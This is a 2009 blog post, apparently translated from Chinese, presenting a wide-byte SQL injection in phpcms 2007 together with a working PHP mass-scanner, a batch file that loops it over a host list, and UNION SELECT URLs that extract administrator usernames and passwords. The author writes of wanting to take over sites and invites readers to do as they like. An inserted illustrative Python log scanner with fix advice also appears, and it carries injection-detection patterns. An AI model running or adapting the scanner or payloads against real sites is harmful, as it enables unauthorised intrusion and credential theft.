phpcms 2007 GBK edition 0day injection scanning script

Saturday, 22 August 2009

I was actually fairly busy and wanted to take a whole site, and found that this 0day is still pretty good, so I wrote a script that automatically scans for sites that have the vulnerability. As for automatically injecting the account and password out, let's skip that, no showing off.

Looked around online; it seems it was discovered by 小蟑螂 of 零客网安 0.S.T~~

The vulnerability is on line 4 of member/member.php; the code is as follows:

..............
$m = $db->get_one("SELECT * FROM ".TABLE_MEMBER." m , ".TABLE_MEMBER_INFO." i WHERE m.userid=i.userid AND m.username='$username' ","CACHE",86400);
..............

The username variable goes into the query without any filtering, and the included include/common.inc.php contains the following code:

................
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
...............

Heh, let's start injecting! Since the variable is wrapped in single quotes ("'"), we need a way around that restriction; see the 80sec article for the details:
http://www.80sec.com/php-coder-class-security-alert.html
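As an added illustration (not part of the original post or of phpcms), the script below models PHP's addslashes() over raw bytes to show why a GBK lead byte placed before the quote defeats it, and then scans constructed access-log lines for requests to member/member.php that carry that pattern or a UNION SELECT. The log lines, client addresses and helper names are all assumptions made for the example.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed access-log lines (assumed combined format): the first is benign,
# the other two have the request shape the post describes.
SAMPLE_LOG = (
    '10.0.0.5 - - [22/Aug/2009:10:00:01 +0800] "GET /member/member.php?username=alice HTTP/1.0" 200 812\n'
    '10.0.0.9 - - [22/Aug/2009:10:00:02 +0800] "GET /member/member.php?username=tlm%cf\' HTTP/1.0" 200 1203\n'
    '10.0.0.9 - - [22/Aug/2009:10:00:03 +0800] "GET /member/member.php?username=x%cf\'union/**/select/**/1,2'
    '/**/from/**/phpcms_member HTTP/1.0" 200 640\n'
)

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')
WIDE_BYTE_QUOTE = re.compile(rb"[\x81-\xfe]'")              # GBK lead byte right before a quote
UNION_SELECT = re.compile(rb"union(?:\s|/\*.*?\*/)*select", re.I)
BARE_QUOTE = re.compile(r"(?<!\\)'")                         # a quote with no backslash before it

def php_addslashes(raw: bytes) -> bytes:
    """Byte-level model of PHP addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def quote_survives_gbk(raw: bytes) -> bool:
    """True when the quote is still bare after addslashes() and a GBK decode,
    i.e. the inserted 0x5C was absorbed as the trail byte of a 2-byte character."""
    return BARE_QUOTE.search(php_addslashes(raw).decode("gbk", "replace")) is not None

def analyse_query(query: str) -> list:
    """Findings for the username parameter of one member/member.php request."""
    findings = []
    for pair in unquote_to_bytes(query).split(b"&"):
        name, _, value = pair.partition(b"=")
        if name != b"username":
            continue
        if WIDE_BYTE_QUOTE.search(value) and quote_survives_gbk(value):
            findings.append("wide-byte quote bypass")
        if UNION_SELECT.search(value):
            findings.append("union select")
    return findings

def scan_log(text: str) -> list:
    """Return (client, request target, findings) for suspicious member.php hits."""
    hits = []
    for line in text.splitlines():
        m = REQUEST.match(line)
        if m and urlsplit(m.group(3)).path.endswith("/member/member.php"):
            findings = analyse_query(urlsplit(m.group(3)).query)
            if findings:
                hits.append((m.group(1), m.group(3), findings))
    return hits
```

The same check shows the fix: escaping that is not charset-aware is not enough, so the query must use a charset-aware escape or a prepared statement, and the input must not reach the query through extract() at all.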

I modified 鬼仔's thing a bit and just used it directly, showing off, haha...

=================scanbug.php==========================================

<?php
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
PHPcms SODB-2008-13 Exp
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";
//$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo "Error... check the path!\r\n\r\n"; die;}
/*get   $prefix*/
$packet ="GET ".$path."member/member.php?username=tlm%cf' HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
//$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
echo "\n\n正在测试站点: $host ……\n";
if (stripos($html, "in your SQL syntax") !== false) // eregi() is deprecated since PHP 5.3
{
$temp=explode("FROM ",$html);
$temp2=array(''); // avoid an undefined variable when "FROM " is not in the response
if(isset($temp[1])){$temp2=explode(" ",$temp[1]);}
if ($temp2[0]){
$prefix=$temp2[0];
echo "数据库为: ".$prefix."\r\n";
echo "当前站点发现漏洞,请手工检测...\r\n";
}
$filename = "php0day.txt";
$handle   = fopen ($filename,"a+");
if (!is_writable ($filename)){
die ("文件:".$filename."不可写,请检查其属性后重试!");
}
if (!fwrite ($handle,"\n存在漏洞的站点\t$host")){
die ("生成文件".$filename."失败!");
}
fwrite($handle,"\r\n");
fwrite($handle,"当前站点数据库\t");
fwrite($handle,$prefix);

fwrite($handle,"\r\n");
print_r('内容已经写入文件!');
fclose ($handle); // close the file handle
}
else
exit("没漏洞哦……\n");

?>

===================================END==========================================

The batch file is even simpler:

===================================scan.bat=======================================

@echo off
title PHPcms PHPcms 0DAY自动注射程序工作中……
FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (php.txt) do D:\PHPnow-1.4.5-20\php-5.2.6-Win32\php.exe 0dayhpcms.php %%i /
pause

====================================end==========================================

There seem to be a lot of sites with this vulnerability; a quick random scan gave a very high hit rate, heh~

As for querying out the password, just use UNION. I found a tool online and captured its packets; it seems the number of columns differs between versions.

==============================================

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/**/where/**/userid=1

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62/**/from/**/phpcms_member/**/where/**/userid=1/*

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,username,password,52,53,54,55,56,57/**/from/**/phpcms_member/**/where/**/userid=1/*

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58/**/from/**/phpcms_member/**/where/**/userid=1/*

==============================================

Just replace the database name in these; the database name has already been found by the scan. Exploitation tools exist, do what you like with them...
